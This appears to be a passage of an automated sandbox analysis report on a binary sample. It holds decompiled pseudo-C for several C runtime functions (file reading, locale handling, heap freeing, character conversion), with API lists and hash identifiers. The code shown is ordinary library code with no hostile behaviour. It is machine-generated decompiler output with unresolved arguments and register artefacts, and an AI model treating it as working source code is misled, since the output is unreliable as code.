                            • Opcode ID: c269b97b9905f15a49733a8c35e577445ffbc74541814b88d2834e78245f9eb7
                            • Instruction ID: ef007f0316f0161483825e7800360616755226c5e25d87c88738d12933986736
                            • Opcode Fuzzy Hash: c269b97b9905f15a49733a8c35e577445ffbc74541814b88d2834e78245f9eb7
                            • Instruction Fuzzy Hash: 30516371A00118EFCB24EF6CCA84BAE77B9EF84345F14C618F91A97344D634EA50CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E01321660(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                            				signed int _v8;
                            				char* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t90;
                            				intOrPtr* _t92;
                            				signed int _t94;
                            				char _t97;
                            				signed int _t105;
                            				void* _t106;
                            				signed int _t107;
                            				signed int _t110;
                            				signed int _t113;
                            				intOrPtr* _t114;
                            				signed int _t118;
                            				signed int _t119;
                            				signed int _t120;
                            				char* _t121;
                            				signed int _t125;
                            				signed int _t131;
                            				signed int _t133;
                            				void* _t134;
                            
                            				_t125 = __edx;
                            				_t121 = _a4;
                            				_t119 = _a8;
                            				_t131 = 0;
                            				_v12 = _t121;
                            				_v8 = _t119;
                            				if(_a12 == 0 || _a16 == 0) {
                            					L5:
                            					return 0;
                            				} else {
                            					_t138 = _t121;
                            					if(_t121 != 0) {
                            						_t133 = _a20;
                            						__eflags = _t133;
                            						if(_t133 == 0) {
                            							L9:
                            							__eflags = _t119 - 0xffffffff;
                            							if(_t119 != 0xffffffff) {
                            								_t90 = E01324360(_t131, _t121, _t131, _t119);
                            								_t134 = _t134 + 0xc;
                            							}
                            							__eflags = _t133 - _t131;
                            							if(__eflags == 0) {
                            								goto L3;
                            							} else {
                            								_t94 = _t90 | 0xffffffff;
                            								_t125 = _t94 % _a12;
                            								__eflags = _a16 - _t94 / _a12;
                            								if(__eflags > 0) {
                            									goto L3;
                            								}
                            								L13:
                            								_t131 = _a12 * _a16;
                            								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                            								_v20 = _t131;
                            								_t120 = _t131;
                            								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                            									_v16 = 0x1000;
                            								} else {
                            									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                            								}
                            								__eflags = _t131;
                            								if(_t131 == 0) {
                            									L40:
                            									return _a16;
                            								} else {
                            									do {
                            										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                            										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                            											L24:
                            											__eflags = _t120 - _v16;
                            											if(_t120 < _v16) {
                            												_t97 = E01323ABB(_t120, _t125, _t133);
                            												__eflags = _t97 - 0xffffffff;
                            												if(_t97 == 0xffffffff) {
                            													L48:
                            													return (_t131 - _t120) / _a12;
                            												}
                            												__eflags = _v8;
                            												if(_v8 == 0) {
                            													L44:
                            													__eflags = _a8 - 0xffffffff;
                            													if(__eflags != 0) {
                            														E01324360(_t131, _a4, 0, _a8);
                            														_t134 = _t134 + 0xc;
                            													}
                            													 *((intOrPtr*)(E013231DA(__eflags))) = 0x22;
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													L4:
                            													E01323941(_t125, _t131, _t133);
                            													goto L5;
                            												}
                            												_t123 = _v12;
                            												_v12 = _v12 + 1;
                            												 *_v12 = _t97;
                            												_t120 = _t120 - 1;
                            												_t70 =  &_v8;
                            												 *_t70 = _v8 - 1;
                            												__eflags =  *_t70;
                            												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                            												goto L39;
                            											}
                            											__eflags = _v16;
                            											if(_v16 == 0) {
                            												_t105 = 0x7fffffff;
                            												__eflags = _t120 - 0x7fffffff;
                            												if(_t120 <= 0x7fffffff) {
                            													_t105 = _t120;
                            												}
                            											} else {
                            												__eflags = _t120 - 0x7fffffff;
                            												if(_t120 <= 0x7fffffff) {
                            													_t55 = _t120 % _v16;
                            													__eflags = _t55;
                            													_t125 = _t55;
                            													_t110 = _t120;
                            												} else {
                            													_t125 = 0x7fffffff % _v16;
                            													_t110 = 0x7fffffff;
                            												}
                            												_t105 = _t110 - _t125;
                            											}
                            											__eflags = _t105 - _v8;
                            											if(_t105 > _v8) {
                            												goto L44;
                            											} else {
                            												_push(_t105);
                            												_push(_v12);
                            												_t106 = E013242A5(_t125, _t131, _t133);
                            												_pop(_t123);
                            												_push(_t106);
                            												_t107 = E013241A8(_t120, _t125, _t131, _t133, __eflags);
                            												_t134 = _t134 + 0xc;
                            												__eflags = _t107;
                            												if(_t107 == 0) {
                            													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                            													goto L48;
                            												}
                            												__eflags = _t107 - 0xffffffff;
                            												if(_t107 == 0xffffffff) {
                            													L47:
                            													_t80 = _t133 + 0xc;
                            													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                            													__eflags =  *_t80;
                            													goto L48;
                            												}
                            												_v12 = _v12 + _t107;
                            												_t120 = _t120 - _t107;
                            												_v8 = _v8 - _t107;
                            												goto L39;
                            											}
                            										}
                            										_t113 =  *(_t133 + 4);
                            										__eflags = _t113;
                            										if(__eflags == 0) {
                            											goto L24;
                            										}
                            										if(__eflags < 0) {
                            											goto L47;
                            										}
                            										_t131 = _t120;
                            										__eflags = _t120 - _t113;
                            										if(_t120 >= _t113) {
                            											_t131 = _t113;
                            										}
                            										__eflags = _t131 - _v8;
                            										if(_t131 > _v8) {
                            											_t133 = 0;
                            											__eflags = _a8 - 0xffffffff;
                            											if(__eflags != 0) {
                            												E01324360(_t131, _a4, 0, _a8);
                            												_t134 = _t134 + 0xc;
                            											}
                            											_t114 = E013231DA(__eflags);
                            											_push(_t133);
                            											_push(_t133);
                            											_push(_t133);
                            											_push(_t133);
                            											 *_t114 = 0x22;
                            											_push(_t133);
                            											goto L4;
                            										} else {
                            											E013242D7(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                            											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                            											 *_t133 =  *_t133 + _t131;
                            											_v12 = _v12 + _t131;
                            											_t120 = _t120 - _t131;
                            											_t134 = _t134 + 0x10;
                            											_v8 = _v8 - _t131;
                            											_t131 = _v20;
                            										}
                            										L39:
                            										__eflags = _t120;
                            									} while (_t120 != 0);
                            									goto L40;
                            								}
                            							}
                            						}
                            						_t118 = _t90 | 0xffffffff;
                            						_t90 = _t118 / _a12;
                            						_t125 = _t118 % _a12;
                            						__eflags = _a16 - _t90;
                            						if(_a16 <= _t90) {
                            							goto L13;
                            						}
                            						goto L9;
                            					}
                            					L3:
                            					_t92 = E013231DA(_t138);
                            					_push(_t131);
                            					_push(_t131);
                            					_push(_t131);
                            					_push(_t131);
                            					 *_t92 = 0x16;
                            					_push(_t131);
                            					goto L4;
                            				}
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: c2215165c55aaec1ce3bc15af05cc047e0c6a00bae43fdd925e0692e753908a1
                            • Instruction ID: e96bbc068a4b0a272071fa1099359a5fc9f98e34d0fb4b071410f6a255e94334
                            • Opcode Fuzzy Hash: c2215165c55aaec1ce3bc15af05cc047e0c6a00bae43fdd925e0692e753908a1
                            • Instruction Fuzzy Hash: 0D51F831A00229EFDB30BF6D8A4459EBFB9EF91338F188229E92556190D7719951CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E013287EB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed int _t15;
                            				LONG* _t21;
                            				long _t23;
                            				void* _t29;
                            				void* _t31;
                            				LONG* _t33;
                            				void* _t34;
                            				void* _t35;
                            
                            				_t35 = __eflags;
                            				_t29 = __edx;
                            				_t25 = __ebx;
                            				_push(0xc);
                            				_push(0x132d780);
                            				E01322A5C(__ebx, __edi, __esi);
                            				_t31 = E013252A2(__ebx, _t35);
                            				_t15 =  *0x132fd9c; // 0xfffffffe
                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                            					E01321F64(_t25, _t29, _t31, 0xd);
                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                            					_t33 =  *(_t31 + 0x68);
                            					 *(_t34 - 0x1c) = _t33;
                            					__eflags = _t33 -  *0x132fba8; // 0x132f780
                            					if(__eflags != 0) {
                            						__eflags = _t33;
                            						if(_t33 != 0) {
                            							_t23 = InterlockedDecrement(_t33);
                            							__eflags = _t23;
                            							if(_t23 == 0) {
                            								__eflags = _t33 - 0x132f780;
                            								if(__eflags != 0) {
                            									_push(_t33);
                            									E0132567D(_t25, _t29, _t31, _t33, __eflags);
                            								}
                            							}
                            						}
                            						_t21 =  *0x132fba8; // 0x132f780
                            						 *(_t31 + 0x68) = _t21;
                            						_t33 =  *0x132fba8; // 0x132f780
                            						 *(_t34 - 0x1c) = _t33;
                            						InterlockedIncrement(_t33);
                            					}
                            					 *(_t34 - 4) = 0xfffffffe;
                            					E01328886();
                            				} else {
                            					_t33 =  *(_t31 + 0x68);
                            				}
                            				if(_t33 == 0) {
                            					E01322CAC(_t29, 0x20);
                            				}
                            				return E01322AA1(_t33);
                            			}

                            APIs
                            • __getptd.LIBCMT ref: 013287F7
                              • Part of subcall function 013252A2: __getptd_noexit.LIBCMT ref: 013252A5
                              • Part of subcall function 013252A2: __amsg_exit.LIBCMT ref: 013252B2
                            • __amsg_exit.LIBCMT ref: 01328817
                            • __lock.LIBCMT ref: 01328827
                            • InterlockedDecrement.KERNEL32(?), ref: 01328844
                            • InterlockedIncrement.KERNEL32(0132F780), ref: 0132886F
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 9b991770f953512e2b516849efd538229dc8a10faf15c4d8451a18d4ed7c61a7
                            • Instruction ID: 494ec1cdcd8f8986daad00a11c73874ee2ecdee88d868881a6432ae855148e52
                            • Opcode Fuzzy Hash: 9b991770f953512e2b516849efd538229dc8a10faf15c4d8451a18d4ed7c61a7
                            • Instruction Fuzzy Hash: 70018031901632ABEB31BFADB404B5E7FF8BF05B28F154159E910A7684CB78A941CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 45%
                            			E0132567D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr* _t10;
                            				intOrPtr _t13;
                            				intOrPtr _t24;
                            				void* _t26;
                            
                            				_push(0xc);
                            				_push(0x132d5f8);
                            				_t8 = E01322A5C(__ebx, __edi, __esi);
                            				_t24 =  *((intOrPtr*)(_t26 + 8));
                            				if(_t24 == 0) {
                            					L9:
                            					return E01322AA1(_t8);
                            				}
                            				if( *0x1331cbc != 3) {
                            					_push(_t24);
                            					L7:
                            					_t8 = HeapFree( *0x1330264, 0, ??);
                            					_t32 = _t8;
                            					if(_t8 == 0) {
                            						_t10 = E013231DA(_t32);
                            						 *_t10 = E01323198(GetLastError());
                            					}
                            					goto L9;
                            				}
                            				E01321F64(__ebx, __edx, __edi, 4);
                            				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                            				_t13 = E01321F97(_t24);
                            				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                            				if(_t13 != 0) {
                            					_push(_t24);
                            					_push(_t13);
                            					E01321FC7();
                            				}
                            				 *(_t26 - 4) = 0xfffffffe;
                            				_t8 = E013256D3();
                            				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                            					goto L9;
                            				} else {
                            					_push( *((intOrPtr*)(_t26 + 8)));
                            					goto L7;
                            				}
                            			}

                            APIs
                            • __lock.LIBCMT ref: 0132569B
                              • Part of subcall function 01321F64: __mtinitlocknum.LIBCMT ref: 01321F7A
                              • Part of subcall function 01321F64: __amsg_exit.LIBCMT ref: 01321F86
                              • Part of subcall function 01321F64: EnterCriticalSection.KERNEL32(0132122A,0132122A,?,0132904E,00000004,0132D7E0,0000000C,01325766,?,01321239,00000000,00000000,00000000,?,01325254,00000001), ref: 01321F8E
                            • ___sbh_find_block.LIBCMT ref: 013256A6
                            • ___sbh_free_block.LIBCMT ref: 013256B5
                            • HeapFree.KERNEL32(00000000,?,0132D5F8,0000000C,01321F45,00000000,0132D4A0,0000000C,01321F7F,?,0132122A,?,0132904E,00000004,0132D7E0,0000000C), ref: 013256E5
                            • GetLastError.KERNEL32(?,0132904E,00000004,0132D7E0,0000000C,01325766,?,01321239,00000000,00000000,00000000,?,01325254,00000001,00000214), ref: 013256F6
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                            • String ID:
                            • API String ID: 2714421763-0
                            • Opcode ID: 3359487bdfba264b96f7fd2c8edc14d3dc2089593cca1d619f8ec75c3573d693
                            • Instruction ID: dd4315922994e3233120f3946ed9c20b540e9c94b40c428a95199ed5241f7cb0
                            • Opcode Fuzzy Hash: 3359487bdfba264b96f7fd2c8edc14d3dc2089593cca1d619f8ec75c3573d693
                            • Instruction Fuzzy Hash: C3016771945336EAEB307F799C05B9E3BB8AF11768F205508E510A6080DB38D6408B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01329F35(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v8;
                            				signed int _v12;
                            				char _v20;
                            				char _t43;
                            				char _t46;
                            				signed int _t53;
                            				signed int _t54;
                            				intOrPtr _t56;
                            				intOrPtr _t57;
                            				int _t58;
                            				signed short* _t59;
                            				short* _t60;
                            				int _t65;
                            				char* _t74;
                            
                            				_t74 = _a8;
                            				if(_t74 == 0 || _a12 == 0) {
                            					L5:
                            					return 0;
                            				} else {
                            					if( *_t74 != 0) {
                            						E01326D18( &_v20, __edx, __edi, _a16);
                            						_t43 = _v20;
                            						__eflags =  *(_t43 + 0x14);
                            						if( *(_t43 + 0x14) != 0) {
                            							_t46 = E0132A066( *_t74 & 0x000000ff,  &_v20);
                            							__eflags = _t46;
                            							if(_t46 == 0) {
                            								__eflags = _a4;
                            								_t40 = _v20 + 4; // 0x840ffff8
                            								__eflags = MultiByteToWideChar( *_t40, 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
                            								if(__eflags != 0) {
                            									L10:
                            									__eflags = _v8;
                            									if(_v8 != 0) {
                            										_t53 = _v12;
                            										_t11 = _t53 + 0x70;
                            										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                            										__eflags =  *_t11;
                            									}
                            									return 1;
                            								}
                            								L21:
                            								_t54 = E013231DA(__eflags);
                            								 *_t54 = 0x2a;
                            								__eflags = _v8;
                            								if(_v8 != 0) {
                            									_t54 = _v12;
                            									_t33 = _t54 + 0x70;
                            									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                            									__eflags =  *_t33;
                            								}
                            								return _t54 | 0xffffffff;
                            							}
                            							_t56 = _v20;
                            							_t15 = _t56 + 0xac; // 0x75ff5003
                            							_t65 =  *_t15;
                            							__eflags = _t65 - 1;
                            							if(_t65 <= 1) {
                            								L17:
                            								_t24 = _t56 + 0xac; // 0x75ff5003
                            								__eflags = _a12 -  *_t24;
                            								if(__eflags < 0) {
                            									goto L21;
                            								}
                            								__eflags = _t74[1];
                            								if(__eflags == 0) {
                            									goto L21;
                            								}
                            								L19:
                            								_t26 = _t56 + 0xac; // 0x75ff5003
                            								_t57 =  *_t26;
                            								__eflags = _v8;
                            								if(_v8 == 0) {
                            									return _t57;
                            								}
                            								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                            								return _t57;
                            							}
                            							__eflags = _a12 - _t65;
                            							if(_a12 < _t65) {
                            								goto L17;
                            							}
                            							__eflags = _a4;
                            							_t21 = _t56 + 4; // 0x840ffff8
                            							_t58 = MultiByteToWideChar( *_t21, 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
                            							__eflags = _t58;
                            							_t56 = _v20;
                            							if(_t58 != 0) {
                            								goto L19;
                            							}
                            							goto L17;
                            						}
                            						_t59 = _a4;
                            						__eflags = _t59;
                            						if(_t59 != 0) {
                            							 *_t59 =  *_t74 & 0x000000ff;
                            						}
                            						goto L10;
                            					} else {
                            						_t60 = _a4;
                            						if(_t60 != 0) {
                            							 *_t60 = 0;
                            						}
                            						goto L5;
                            					}
                            				}
                            			}


                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01329F69
                            • __isleadbyte_l.LIBCMT ref: 01329F9D
                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,01326B14,00000109,00BFBBEF,00000003), ref: 01329FCE
                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,01326B14,00000109,00BFBBEF,00000003), ref: 0132A03C
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 33dc651528c1ece6ae7a4d967a392ab653d860b8ad0da3af0d8c0720da7daad1
                            • Instruction ID: 9925a9467550e1661e90385b3e113a8a5166dd9d538ce8a85aa80a7476eeecee
                            • Opcode Fuzzy Hash: 33dc651528c1ece6ae7a4d967a392ab653d860b8ad0da3af0d8c0720da7daad1
                            • Instruction Fuzzy Hash: EE31B231A0027AFFDB61EF68C880EAE3FB5FF0121AF1585A8E5698B191D730D944DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E01328F57(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed int _t13;
                            				void* _t25;
                            				intOrPtr _t27;
                            				intOrPtr _t29;
                            				void* _t30;
                            				void* _t31;
                            
                            				_t31 = __eflags;
                            				_t26 = __edi;
                            				_t25 = __edx;
                            				_t22 = __ebx;
                            				_push(0xc);
                            				_push(0x132d7c0);
                            				E01322A5C(__ebx, __edi, __esi);
                            				_t29 = E013252A2(__ebx, _t31);
                            				_t13 =  *0x132fd9c; // 0xfffffffe
                            				if(( *(_t29 + 0x70) & _t13) == 0) {
                            					L6:
                            					E01321F64(_t22, _t25, _t26, 0xc);
                            					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                            					_t8 = _t29 + 0x6c; // 0x6c
                            					_t27 =  *0x132fd88; // 0x132fcb0
                            					 *((intOrPtr*)(_t30 - 0x1c)) = E01328F19(_t8, _t25, _t27);
                            					 *(_t30 - 4) = 0xfffffffe;
                            					E01328FC1();
                            				} else {
                            					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                            					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                            						goto L6;
                            					} else {
                            						_t29 =  *((intOrPtr*)(E013252A2(_t22, _t33) + 0x6c));
                            					}
                            				}
                            				if(_t29 == 0) {
                            					E01322CAC(_t25, 0x20);
                            				}
                            				return E01322AA1(_t29);
                            			}


                            APIs
                            • __getptd.LIBCMT ref: 01328F63
                              • Part of subcall function 013252A2: __getptd_noexit.LIBCMT ref: 013252A5
                              • Part of subcall function 013252A2: __amsg_exit.LIBCMT ref: 013252B2
                            • __getptd.LIBCMT ref: 01328F7A
                            • __amsg_exit.LIBCMT ref: 01328F88
                            • __lock.LIBCMT ref: 01328F98
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            • Opcode ID: 07cd85fff6ff97c7e791815ad33fc259acbd5c246fbbd0ec5d21056f42e9ca6f
                            • Instruction ID: 15dc13205acd01c2ef1072c42dfd1425dea07b4c5d3191b0de69106abc66c636
                            • Opcode Fuzzy Hash: 07cd85fff6ff97c7e791815ad33fc259acbd5c246fbbd0ec5d21056f42e9ca6f
                            • Instruction Fuzzy Hash: 07F09031940736AFE730BFADA400F4E33F56F10728F144589D650A72D4CB349A05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%